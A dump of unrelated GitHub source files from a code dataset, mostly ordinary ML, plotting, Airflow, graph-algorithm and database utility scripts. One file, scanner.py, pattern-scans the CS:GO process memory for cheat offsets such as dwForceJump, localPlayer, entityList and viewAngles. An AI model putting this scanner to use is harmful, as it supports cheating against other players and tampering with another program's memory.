label = row\n img = os.path.join(root, 'data', img) + '.jpg'\n label = int(label)\n images.append(img)\n labels.append(label)\n assert len(images) == len(labels)\n return images, labels\n\n\nimg_mean = tf.constant([0.485, 0.456, 0.406])\nimg_std = tf.constant([0.229, 0.224, 0.225])\n\n\ndef normalize(x, mean=img_mean, std=img_std):\n # x: [224, 224, 3]\n # mean: [224, 224, 3], std: [3]\n x = (x - mean) / std\n return x\n\n\ndef preprocess(x, y):\n \"\"\"\n preprocess the data\n :param x: the path of the images\n :param y: labels\n \"\"\"\n # data augmentation, 0~255\n x = tf.io.read_file(x)\n x = tf.image.decode_jpeg(x, channels=3)\n # resize the image,you can change the value in the another net\n x = tf.image.resize(x, [224, 224])\n # turn around images\n x = tf.image.random_crop(x, [224, 224, 3])\n # # x: [0,255]=> 0~1\n x = tf.cast(x, dtype=tf.float32) / 255.\n # 0~1 => D(0,1)\n x = normalize(x)\n y = tf.convert_to_tensor(y)\n return x, y\n\n\nprint(\"正在导入数据\")\n# 声明\ntraining = 'training.csv'\ntest = 'annotation.csv'\n\n# 导入数据集(32,32,3,... )\n# x, y = load_s(training)\nx, y = load_csv('af2020cv-2020-05-09-v5-dev', 'training.csv')\nx_test, y_test = load_csv('af2020cv-2020-05-09-v5-dev', 'annotation.csv')\n# x_test, y_test = import_dataset(test)\n# y = tf.squeeze(y, axis=1)\n# y_test = tf.squeeze(y_test, axis=1)\n# print(x.shape, y.shape, x_test.shape, y_test.shape)\n\ntrain_db = tf.data.Dataset.from_tensor_slices((x, y))\ntrain_db = train_db.shuffle(1000).map(preprocess).batch(32)\n\ntest_db = tf.data.Dataset.from_tensor_slices((x_test, y_test))\ntest_db = test_db.map(preprocess).batch(256)\n\nsample = next(iter(train_db))\nprint('sample:', sample[0].shape, sample[1].shape,\n tf.reduce_min(sample[0]), tf.reduce_max(sample[0]))\n\n\ndef main(epochs, lr, ckpt_interval, ckpt_path, weights_path):\n reminder = Reminder()\n reminder._register()\n count = 0\n temp = 0\n content_list = []\n # 模型训练\n print('开始训练')\n # [b, 32, 32, 3] => [b, 1, 1, 512]\n # model = resnet18()\n model = SEResNet18()\n # model = ResNet50(include_top=True, squeeze=True, squeeze_type='pre', classes=20)\n model.build(input_shape=(None, 224, 224, 3))\n # model.summary() # 统计网络参数\n # optimizer = optimizers.Adam(lr=1e-3)\n optimizer_init = optimizers.SGD(lr=lr)\n optimizer_sgd1 = optimizers.SGD(learning_rate=lr / 10)\n optimizer_sgd2 = optimizers.SGD(learning_rate=lr / 100)\n optimizer_sgd3 = optimizers.SGD(learning_rate=lr / 1000)\n optimizer = optimizer_init\n # [1, 2] + [3, 4] => [1, 2, 3, 4]\n model.load_weights(weights_path)\n variables = model.trainable_variables\n for epoch in tqdm(range(1, epochs + 1)):\n optimizer = optimizer_init\n if epoch == 20:\n optimizer = optimizer_sgd1\n if epoch == 50:\n optimizer = optimizer_sgd2\n if epoch == 80:\n optimizer = optimizer_sgd3\n for step, (x, y) in enumerate(train_db):\n\n with tf.GradientTape() as tape:\n # [b, 32, 32, 3] => [b, 1, 1, 512]\n out = model(x)\n # [b] => [b, 10]\n y_onehot = tf.one_hot(y, depth=20)\n # compute loss\n loss = tf.losses.categorical_crossentropy(y_onehot, out, from_logits=True)\n loss = tf.reduce_mean(loss)\n # print('loss:', loss)\n\n grads = tape.gradient(loss, variables)\n optimizer.apply_gradients(zip(grads, variables))\n if step % 100 == 0:\n with summary_writer.as_default():\n tf.summary.scalar('loss', float(loss), step=step)\n\n # print('loss: %g, acc: %g' % (loss, acc))\n\n # tf.keras.models.save_model(\n # model, ckpt_path + 'tf_ckpt_%d.h5' % epoch, include_optimizer=True,\n # save_format='tf', signatures=None, options=None\n # )\n try:\n if epoch % ckpt_interval == 0:\n print('保存模型中.....')\n model.save_weights(ckpt_path + 'tf_ckpt_%d.h5' % epoch)\n print('保存成功')\n except KeyboardInterrupt:\n print('训练被中断...正在保存模型')\n model.save_weights(ckpt_path + 'tf_ckpt_%d.h5' % epoch)\n print('保存成功')\n\n total_num = 0\n total_correct = 0\n # 模型测试\n print('\\n目前是 %d 个epoch结束之后的测试,总共 %d' % (epoch, epochs))\n for x, y in test_db:\n out = model(x)\n prob = tf.nn.softmax(out, axis=1)\n pred = tf.argmax(prob, axis=1)\n pred = tf.cast(pred, dtype=tf.int32)\n\n correct = tf.cast(tf.equal(pred, y), dtype=tf.int32)\n correct = tf.reduce_sum(correct)\n\n total_num += x.shape[0]\n total_correct += int(correct)\n\n acc = total_correct / total_num\n with summary_writer.as_default():\n tf.summary.scalar('acc', float(acc), step=epoch)\n print('loss: %f, acc: %f' % (loss, acc))\n if epoch % 10 == 0:\n content_list.append('Epoch %d, Loss: %f, acc: %f\\n' % (epoch, loss, acc))\n #\n if temp > acc:\n count += 1\n if count > 5:\n break\n else:\n count = 0\n temp = acc\n\n reminder.send('SE-ResNet Training', str(content_list))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epoch\", type=int, default=10, help=\"number of epochs\")\n parser.add_argument(\"--batch_size\", type=int, default=64, help=\"number of batch size\")\n parser.add_argument(\"--learning_rate\", type=float, default=0.01, help=\"adjust the learning rate\")\n parser.add_argument(\"--checkpoint_dir\", type=str, default=\"checkpoints/\", help=\"where you save the checkpoint\")\n parser.add_argument(\"--weight_dir\", type=str, default=\"weights/\", help=\"where you save the checkpoint\")\n parser.add_argument(\"--checkpoint_interval\", type=int, default=1, help=\"how many epochs after saving model\")\n parser.add_argument(\"--evaluate_interval\", type=int, default=1, help=\"how many epochs per evaluate model\")\n parser.add_argument(\"--train_path\", type=str, default=\"training.csv\", help=\"where the train image csv file\")\n parser.add_argument(\"--test_path\", type=str, default=\"annotation.csv\", help=\"where the test image csv file\")\n\n os.makedirs(\"checkpoints\", exist_ok=True)\n\n opt = parser.parse_args()\n print(opt)\n\n main(opt.epoch, opt.learning_rate, opt.checkpoint_interval, opt.checkpoint_dir, opt.weight_dir)","repo_name":"Team-Coding-Like-Immortal/underwater-se-resnet","sub_path":"se-resnet/my_seresnet_train.py","file_name":"my_seresnet_train.py","file_ext":"py","file_size_in_byte":10064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38524911638","text":"from app import app, db \nfrom app.models import User, Student, Quiz, Result \n\nstudents = Student.query.all()\nquizzes = Quiz.query.all()\nresults = Result.query.all()\nusers = User.query.all()\n\nall_data = students + quizzes + results + users\n\nfor item in all_data:\n db.session.delete(item)\n\ndb.session.commit()\n\nu = User(username='admin')\nu.set_password('password')\ns1 = Student(first_name='Spongebob', last_name='Squarepants')\ns2 = Student(first_name='Patrick', last_name='Star')\ns3 = Student(first_name='John', last_name='Smith')\nq1 = Quiz(subject='Python Basics', num_of_questions=10, date='February 25th, 2021')\nq2 = Quiz(subject='Python Intermediate', num_of_questions=15, date='March 29th, 2021')\nq3 = Quiz(subject='Advanced SQL', num_of_questions=10, date='April 25th, 2021')\nr1 = Result(student=s1, quiz=q1, score=100)\nr2 = Result(student=s1, quiz=q2, score=85)\nr3 = Result(student=s1, quiz=q3, score=95)\n\nseed = [u, s1, s2, s3, q1, q2, q3]\n\nfor item in seed:\n db.session.add(item)\n\ndb.session.commit()\n\n\n@app.shell_context_processor\ndef make_shell_context():\n return {\"db\": db, \"User\": User, \"Student\": Student, \"Quiz\": Quiz, \"Result\": Result}\n\n\n\n","repo_name":"wilsonvetdev/IS211_Assignment12","sub_path":"grades_app.py","file_name":"grades_app.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71592959528","text":"from datetime import timedelta, datetime\n\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom textwrap import dedent\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2022, 6, 7),\n 'email': ['airflow@example.com'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 2,\n 'retry_delay': timedelta(minutes=10)\n}\n\n\ndef get_first_task():\n print(f\"This is the first task.\")\n\n\ndef get_second_task():\n print(f\"This is the second task.\")\n\n\nwith DAG(\n 'first_dag',\n default_args=default_args,\n description='Our first DAG',\n schedule_interval=timedelta(days=1),\n tags=['first_DAG']\n) as dag:\n\n task_1 = PythonOperator(\n task_id='first_task',\n python_callable=get_first_task,\n dag=dag\n )\n\n task_1.doc_md = dedent(\n \"\"\"\\\n#### Task Documentation\nYou can document your task using the attributes `doc_md` (markdown),\n`doc` (plain text), `doc_rst`, `doc_json`, `doc_yaml` which gets\nrendered in the UI's Task Instance Details page.\n![img](http://montcs.bloomu.edu/~bobmon/Semesters/2012-01/491/import%20soul.png)\n\n\"\"\"\n )\n\n dag.doc_md = __doc__ # providing that you have a docstring at the beginning of the DAG\n dag.doc_md = \"\"\"\n This is some custom documentation .... :))))))\n \"\"\"\n\n task_2 = PythonOperator(\n task_id='second_task',\n python_callable=get_second_task,\n dag=dag\n )\n\n task_1 >> task_2\n","repo_name":"CodingBee77/airflow","sub_path":"dags/first_dag.py","file_name":"first_dag.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73203603687","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom fetchdata.fetch_ticker_data import TicKer\nfrom fetchdata.indicator import EMA_whole_cal, EMA_current_Cal, MACD, MACD_current\n\nclass Demonstation:\n def __init__(self):\n self.figure, self.ax = plt.subplots(2)\n\n def graph_MACD(self, DATA, num):\n MACD = DATA['MACD'].to_numpy()\n single_line = DATA['Single Line'].to_numpy()\n time = pd.to_datetime(DATA.index)\n self.ax[num].plot(time, MACD, color='b', label='MACD')\n self.ax[num].plot(time, single_line, color='g', label='Single Line')\n self.ax[num].axhline(y=0, color='k')\n self.ax[num].axhline(y=1, color='r')\n self.ax[num].axhline(y=-1, color='r')\n self.ax[num].axhline(y=2, color='y')\n self.ax[num].axhline(y=-2, color='y')\n self.ax[num].legend(('MACD', 'Single Line'), bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n\n def graph_EMA(self, DATA, EMA_list, num):\n time = pd.to_datetime(DATA[0].index)\n for ema in DATA:\n self.ax[num].plot(time, ema)\n self.ax[0].legend(tuple(EMA_list), bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n\n def draw_axe(self, ticker, data, ema_list, ax0, ax1):\n self.clean_fig()\n DATA = TicKer(ticker).get_price_by_period(data[0], data[1])\n EMA = [EMA_whole_cal(DATA['Close'], days) for days in ema_list]\n macd, ema_12, ema_26 = MACD(DATA['Close'])\n self.graph_EMA(EMA, ema_list, ax0)\n self.graph_MACD(macd, ax1)\n\n def draw_price(self, ticker, data, ax0, ax1):\n DATA = TicKer(ticker).get_price_by_period(data[0], data[1])\n time = pd.to_datetime(DATA.index)\n macd, ema_12, ema_26 = MACD(DATA['Close'])\n self.ax[ax0].plot(time, DATA['Close'], color='g')\n self.ax[ax0].legend(('$'), bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n self.ax[ax1].plot(time,DATA['Volume'], color='r')\n self.ax[ax1].legend('Volume', bbox_to_anchor=(1.05, 1), loc='upper right', borderaxespad=0.)\n\n def cross_detector(self, data):\n p1 = data[0:1].to_numpy()\n p2 = data[1:2].to_numpy()\n if p1[0] > p2[0] and p1[1] < p2[1] or p1[0] < p2[0] and p1[1] > p2[1]:\n return True\n else:\n return False\n\n def observe(self, macd, ema, ema_list, num, ax0, ax1):\n self.clean_fig()\n self.graph_MACD(macd[num:], ax1)\n EMA = [n[num:] for n in ema]\n self.graph_EMA(EMA, ema_list, ax0)\n\n def clean_fig(self):\n self.ax[0].cla()\n self.ax[1].cla()\n\n def show_graph(self, time):\n plt.pause(time)\n\n def title(self, ticker):\n self.figure.suptitle(ticker, fontsize=20)\n\n def close_graph(self):\n plt.close(self.figure)\n\n","repo_name":"Kham-Tran/Python-Stock-indicators","sub_path":"Monitor/Demonstration.py","file_name":"Demonstration.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8675210968","text":"import pymem\r\nimport re\r\n\r\n\r\ndef pogout(modname, pattern, extra = 0, offset = 0, relative = True):\r\n pog = pymem.Pymem(\"csgo.exe\")\r\n out = pymem.process.module_from_name(pog.process_handle, modname)\r\n bytes = pog.read_bytes(out.lpBaseOfDll, out.SizeOfImage)\r\n match = re.search(pattern, bytes).start()\r\n yes_relative = pog.read_int(out.lpBaseOfDll + match + offset) + extra - out.lpBaseOfDll\r\n non_relative = pog.read_int(out.lpBaseOfDll + match + offset) + extra\r\n return [yes_relative, out.lpBaseOfDll] if relative else non_relative\r\n\r\n\r\nPOGdwForceJump = pogout(\"client.dll\", rb\"\\x8B\\x0D....\\x8B\\xD6\\x8B\\xC1\\x83\\xCA\\x02\", 0, 2)\r\nglobal dwForceJump\r\ndwForceJump = POGdwForceJump[1] + POGdwForceJump[0]\r\nPOGlocalPlayer = pogout(\"client.dll\", rb\"\\x8D\\x34\\x85....\\x89\\x15....\\x8B\\x41\\x08\\x8B\\x48\\x04\\x83\\xF9\\xFF\", 4, 3)\r\nglobal localPlayer\r\nlocalPlayer = POGlocalPlayer[0] + POGlocalPlayer[1]\r\nPOGentityList = pogout(\"client.dll\", rb\"\\xBB....\\x83\\xFF\\x01\\x0F\\x8C....\\x3B\\xF8\", 0, 1)\r\nentityList = POGentityList[0] + POGlocalPlayer[1]\r\nPOGclientstate = pogout(\"engine.dll\", rb\"\\xA1....\\x33\\xD2\\x6A\\x00\\x6A\\x00\\x33\\xC9\\x89\\xB0\", 0, 1)\r\ndwclientState = POGclientstate[0] + POGclientstate[1]\r\nPOGviewangles = pogout(\"engine.dll\", rb\"\\xF3\\x0F\\x11\\x80....\\xD9\\x46\\x04\\xD9\\x05\", 0, 4, False) ## returns offset from dwclientstate\r\nviewAngles = POGviewangles","repo_name":"B00Mjack/PyVanguard","sub_path":"PyVanguard/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8849229825","text":"#!/usr/bin/env python3\n'''Installs dmri_pcconv'''\n\nfrom os import path\nfrom setuptools import setup, find_namespace_packages\n\ninstall_deps = ['torch', 'lightning', 'npy-patcher', 'einops', 'nibabel']\n\nversion = '1.0.0'\nthis_dir = path.abspath(path.dirname(__file__))\nwith open(path.join(this_dir, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='dmri-pcconv',\n version=version,\n description='Parametric Continuous Convolution framework used for Diffusion MRI.',\n author='Matthew Lyon',\n author_email='matthewlyon18@gmail.com',\n long_description=long_description,\n long_description_content_type='text/markdown',\n python_requires='>=3.8',\n license='MIT License',\n packages=find_namespace_packages(),\n install_requires=install_deps,\n scripts=[],\n classifiers=[\n 'Programming Language :: Python',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n ],\n keywords=['ai', 'cv', 'computer-vision', 'mri', 'dmri', 'super-resolution', 'cnn', 'pcconv'],\n)\n","repo_name":"m-lyon/dmri-pcconv","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25190788775","text":"__author__ = 'Антон'\nwith open('in.txt') as txt:\n data = txt.readlines()\n\nN = int(data[0])\nGR = [[-1 for i in range(N)] for j in range(N)]\nfor i in range(N):\n temp = data[1+i].split(' ')\n temp = [i for i in temp if i != '']\n j = 0\n if temp[j] == '0\\n':\n continue\n while temp[j] != '0\\n':\n GR[int(temp[j])-1][i] = int(temp[j+1])\n j += 2\n\n\ns = int(data[-2]) - 1\nt = int(data[-1]) - 1\n\nS = []\nF = [i for i in range(N)]\nS.append(s)\nF.remove(s)\ndm = [-1 for i in range(N)]\n\n\ndef MAX(G):\n max_dist = -1000\n u = 0\n for v in G:\n if max_dist < dm[v]:\n u = v\n max_dist = dm[v]\n return u\n\ndef WEIGHT(p):\n m = GR[p[0]][p[1]]\n for i in range(2,len(p)-1):\n if m> GR[p[i]][p[i+1]]:\n m = GR[p[i]][p[i+1]]\n return m\n\npred = [-1 for i in range(N)]\n\n# суммы на минимум\n# минимум на максимум\nfor i in range(N):\n if i != s and GR[s][i] >= 0:\n dm[i] = GR[s][i]\n pred[i] = s\n\nfor k in range(N-1):\n w = MAX(F)\n F.remove(w)\n for v in F:\n if min(dm[w], GR[w][v]) > dm[v]:\n dm[v] = min(dm[w], GR[w][v])\n pred[v] = w\n\nwith open(\"out.txt\", 'w') as txt:\n if dm[t] == -1:\n txt.writelines('N')\n else:\n txt.writelines('Y\\n')\n path = []\n v = t\n while v != s:\n path.append(v)\n v = pred[v]\n path.append(v)\n path.reverse()\n txt.writelines(' '.join(map(lambda x: str(x + 1), path)) + '\\n')\n # print(' '.join(map(lambda x: str(x + 1), path)))\n txt.writelines(str(WEIGHT(path)))\n # print(WEIGHT(path))","repo_name":"KowalskiP/University","sub_path":"CA/Dijkstra/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13170356996","text":"from turtle import *\r\nimport Maze_Generator as mazegen\r\nfrom PIL import Image, ImageDraw\r\n\r\ndef draw_maze(maze,policy,current_pos):\r\n rows = maze.shape[0]\r\n columns = maze.shape[1]\r\n image = Image.new(mode='RGB',size = (600,600), color=255)\r\n draw = ImageDraw.Draw(image)\r\n start = 0\r\n end = image.height\r\n x_step = int(end/rows)\r\n y_step = int(end/columns)\r\n\r\n #draws maze based on array\r\n for x in range(0,rows):\r\n for y in range(0,columns):\r\n if maze[y,x] == 0: #GUI coordinates are transposed\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'white',outline='black')\r\n if maze[y,x] == 1:\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'blue',outline='black')\r\n if maze[y,x] == 2:\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'green',outline='black')\r\n if maze[y,x] == 5:\r\n draw.rectangle([x*x_step,y*y_step,(x+1)*x_step,(y+1)*y_step],\r\n fill = 'black',outline='black')\r\n\r\n show_path(policy,current_pos,draw,image)\r\n del draw\r\n image.show()\r\n #image.save('maze.jpeg','JPEG')\r\n\r\n#shows shortest path from current_pos to end\r\ndef show_path(policy,current_pos,draw,image):\r\n x = current_pos[0]\r\n y = current_pos[1]\r\n rows = policy.shape[0]\r\n columns = policy.shape[1]\r\n start = 0\r\n end = image.height\r\n x_step = int(end/rows)\r\n y_step = int(end/columns)\r\n\r\n draw.rectangle([y*y_step,x*x_step,(y+1)*y_step,(x+1)*x_step],\r\n fill = 'yellow',outline='black')\r\n if policy[x,y] == 1:\r\n show_path(policy,(x-1,y),draw,image)\r\n if policy[x,y] == 2:\r\n show_path(policy,(x+1,y),draw,image)\r\n if policy[x,y] == 3:\r\n show_path(policy,(x,y-1),draw,image)\r\n if policy[x,y] == 4:\r\n show_path(policy,(x,y+1),draw,image)\r\n","repo_name":"subramanianjayant/RL_Maze_Solver","sub_path":"MazeGUI.py","file_name":"MazeGUI.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42054226674","text":"import click\nfrom src.graph_matrix import GraphMatrix\nfrom typing import List\nimport ast\nfrom src.transitive_closure.transitive_closure import Warshall\nfrom src.directed_acyclic_graph.topological_sorting.topological_sorting import TopologicalSorting\nfrom src.strong_connected_components.strong_connected_components import StrongComponents\nfrom src.minimal_path.dijkstra import Dijkstra\n\n\n@click.command()\n@click.option(\"--num_vertices\", \"-nv\", help=\"Number of vertices in the graph\",\n required=True, type=int)\n@click.option(\"--edges\", \"-e\", help=\"Edges in the graph, in the format\\n\"\n \"'[[vertice1, vertice2, weight],...]' or\\n\"\n \"'[[vertice1, vertice2],...]'\",\n type=str)\n@click.option(\"--do_warshall/--no_do_warshall\", \"-w/-no_w\", default=False)\n@click.option(\"--topological_sorting/--no_topological_sorting\", \"-ts/-no_ts\",\n default=False)\n@click.option(\"--strong_components/--no_strong_components\", \"-sc/-no_sc\",\n default=False)\n@click.option(\"--dijkstra\", \"-d\", help=\"Dijkstra algorithm, needs a beginning \"\n \"vertice\", default=-1)\ndef main(num_vertices, edges, do_warshall, topological_sorting,\n strong_components,\n dijkstra):\n graph = GraphMatrix(num_vertices, digraph=True)\n\n if edges:\n edges = ast.literal_eval(edges)\n graph = add_edges(graph, edges)\n\n _print_graph(graph)\n\n if do_warshall:\n warshall = Warshall(graph)\n print(warshall)\n\n if topological_sorting:\n print(\"Topological Sorting:\")\n temp = TopologicalSorting(graph)\n print(temp.run())\n\n if strong_components:\n print(\"\\nStrong Components:\")\n temp = StrongComponents(graph)\n print(temp)\n\n if dijkstra >= 0:\n vertice = dijkstra\n str_dijkstra(graph, vertice)\n\n\ndef str_dijkstra(graph: GraphMatrix, start_vertice: int) -> None:\n dijkstra = Dijkstra(graph)\n result = dijkstra.run(start_vertice)\n print(f\"\\nDijkstra from {start_vertice}:\")\n print(\"vertice, cost, path\")\n for vertice in result:\n cost, path = result[vertice]\n print(f\"{vertice}, {cost}, {path}\")\n\n\ndef add_edges(graph: GraphMatrix, edges_list: List[List[int]]) -> GraphMatrix:\n if len(edges_list[0]) == 3:\n for x, y, z in edges_list:\n graph.add_edge(x, y, weight=z)\n else:\n for x, y in edges_list:\n graph.add_edge(x, y)\n return graph\n\n\ndef _print_graph(graph: GraphMatrix) -> None:\n print(\"Graph:\")\n print(graph)\n print(\"Edge Weight:\")\n print(graph.str_weight())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"renan-cunha/graph_lib","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72160828009","text":"import sqlite3, json, yaml\n\n# queries\nLIST_TABLE_NAMES = \"SELECT tbl_name FROM sqlite_master where type='table' AND tbl_name NOT IN ('sqlite_sequence');\"\n\n# read config\nconfig = {}\nwith open(\"./config.yaml\", \"r\") as stream:\n try:\n config = yaml.safe_load(stream)\n except yaml.YAMLError as error:\n print(error)\n\n\n# connect to sql\nconn = sqlite3.connect(config[\"database\"])\n\ndef exclude_table(tableName, config):\n for pattern in config[\"exclude\"][\"tables\"]:\n if pattern in tableName:\n return True\n return False\n\ndef exclude_column(columnName, config):\n for pattern in config[\"exclude\"][\"columns\"]:\n if pattern in columnName:\n return True\n return False\n\n\n# build data object from queries\ndata = {}\ncursor = conn.cursor()\nfor row in cursor.execute(LIST_TABLE_NAMES):\n table = row[0]\n if exclude_table(table, config):\n continue\n records = []\n cursor2 = conn.cursor()\n # print(\"querying \" + table) \n for row2 in cursor2.execute(\"SELECT * FROM \" + table):\n cols = list(map(lambda x: x[0], cursor2.description))\n record = {}\n for i, col in enumerate(cols):\n if not exclude_column(col, config):\n record[col] = row2[i]\n records.append(record)\n data[table] = records\n\n# write data to json\nwith open(config[\"output\"], \"w\") as f:\n f.write(json.dumps(data))\n\n\njoin_queries = []\nwith open(\"./joins.yaml\", \"r\") as stream:\n try:\n join_query = \"\"\n joins = yaml.safe_load(stream)\n tables = []\n cols = []\n for join in joins:\n for side in joins[join]:\n table = next(iter(side))\n tables.append(table)\n cols.append(side[table])\n join_query += \"SELECT * FROM \" + tables[0] + \" INNER JOIN \" + tables[1] + \" ON \" + tables[0] + \".\" + cols[0] + \" = \" + tables[1] + \".\" + cols[1]\n join_queries.append(join_query)\n except yaml.YAMLError as error:\n print(error)\n\nfor query in join_queries:\n cursor4 = conn.cursor()\n # print(query)\n for row in cursor4.execute(query):\n cols = list(map(lambda x: x[0], cursor4.description))\n # print(cols)\n\n\n","repo_name":"harwoodjp/sqlite-to-json","sub_path":"dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39750865645","text":"#!/usr/bin/env python3\nimport rospy\nimport rosparam\nimport h5py\n\nif __name__=='__main__':\n rospy.init_node(\"hdf5_info\")\n param_list = rosparam.get_param(rospy.get_name() + \"/get_hdf5_info\")\n path = param_list[\"hdf5_open_file_path\"]\n h5_file = h5py.File(path, 'r')\n file_count = 0\n for k1 in h5_file:\n file_count += 1\n key_1 = k1\n \n print('data size is ', file_count)\n print('key1: ', key_1)\n for k2 in h5_file[key_1].keys():\n print('key2: ', k2)","repo_name":"tsuchidashinya/denso_common_pkg","sub_path":"hdf5_package/scripts/get_hdf5_info.py","file_name":"get_hdf5_info.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38582493738","text":"#1. Escribir un programa que guarde en una variable el diccionario {'Euro':'€', 'Dollar':'$', 'Yen':'¥'}, \n# pregunte al usuario por una divisa y muestre su símbolo o un mensaje de aviso si la divisa no está en el diccionario.\ndic ={ \"euro\":\"€\",\n 'dollar':\"$\",\n 'yen': \"¥\"\n}\n\ndivisa =(input(\"ingrese una palabra:\\n \"))\nif divisa in dic:\n print(\"el valor esta en la lista\")\nelse: \n print(\"el valor no esta en la lista\")\n","repo_name":"AitsuYuyu/PT","sub_path":"dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11781152179","text":"from kaitaistruct import KaitaiStream\nfrom compiled.test_cell import TestCell\nfrom compiled.test_col_fixed import TestColFixed\n\nimport time\nimport random\nimport statistics\nimport sys\n\n# https://stackoverflow.com/a/34482761\ndef progressbar(it, prefix=\"\", size=60, file=sys.stdout):\n count = len(it)\n def show(j):\n x = int(size*j/count)\n file.write(\"%s[%s%s] %i/%i\\r\" % (prefix, \"#\"*x, \".\"*(size-x), j, count))\n file.flush()\n show(0)\n for i, item in enumerate(it):\n yield item\n show(i+1)\n file.write(\"\\n\")\n file.flush()\n\nnum_iterations = 64\ntimes = {}\ncases = ['test_cell', 'test_col_fixed']\n\nfor k in cases:\n times[k] = []\n\n# https://www.peterbe.com/plog/how-to-do-performance-micro-benchmarks-in-python\nfor i in progressbar(range(num_iterations), \"Running benchmark: \", 40):\n choice = cases[random.randint(0, 1)]\n k = None\n row_0 = None\n t0 = time.time()\n\n with open('./sample.bin', 'rb') as f:\n if choice == 'test_cell':\n k = TestCell(KaitaiStream(f))\n row_0 = k.table.table_rows[0].entries\n elif choice == 'test_col_fixed':\n k = TestColFixed(KaitaiStream(f))\n row_0_type = k.table.table_rows[0]\n row_0 = [row_0_type.a, row_0_type.b, row_0_type.c, row_0_type.d]\n\n t1 = time.time()\n assert len(k.table.table_rows) == 65536, 'len(k.table.table_rows) = {} must be {}'.format(len(k.table.table_rows), 65536)\n assert row_0 == [0x7a46, 0x86b97d9c, 0.842150092124939, 0.5340359913176319], 'row_0 = {} does not match'.format(row_0)\n times[choice].append((t1 - t0) * 1000)\n\nstats = [\n ('MEDIAN', lambda numbers: statistics.median(numbers)),\n ('MEAN', lambda numbers: statistics.mean(numbers)),\n ('STDEV', lambda numbers: statistics.stdev(numbers)),\n ('1st', lambda numbers: numbers[0]),\n ('MIN', lambda numbers: min(numbers)),\n ('MAX', lambda numbers: max(numbers)),\n]\n\nfor name, numbers in times.items():\n print('FUNCTION: {} [Used {} times]'.format(name, len(numbers)))\n for stat in stats:\n print('\\t{:6} {:=10.4f} ms'.format(stat[0], stat[1](numbers)))\n print('')\n","repo_name":"generalmimon/ks-table-py-benchmark","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17760008053","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n__author__ = 'Andreas Bader'\n__version__ = \"0.01\"\n\n# db_folders -> List of DB Folder (for space check)\n# prerun_once -> list of commands to run local once before ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)\n# postrun_once -> list of commands to run local once after ycsb (%%IP%% uses first db vm) (without ycsb, sync or space diff or poweroff commands!)\n# prerun -> list of commands to run before ycsb (all vms or local) (without ycsb, sync or space diff or poweroff commands!)\n# postrun -> list of commands to run after ycsb (all vms or local) (without ycsb, sync or space diff or poweroff commands!)\n# prerun_master -> list of commands to run before ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)\n# postrun_master -> list of commands to run after ycsb (only on master(first=ID 0) vm or local)) (without ycsb, sync or space diff or poweroff commands!)\n# prerun_slaves -> list of commands to run before ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)\n# postrun_slaves -> list of commands to run after ycsb (only on slave (all without master(=ID 0)) vms or local)) (without ycsb, sync or space diff or poweroff commands!)\n# prerun_dict -> list of commands to run before ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)\n# postrun_dict -> list of commands to run after ycsb for each db vm (key=number of vm) (without ycsb, sync or space diff or poweroff commands!) (%%SSH%% not needed)\n# check -> list of 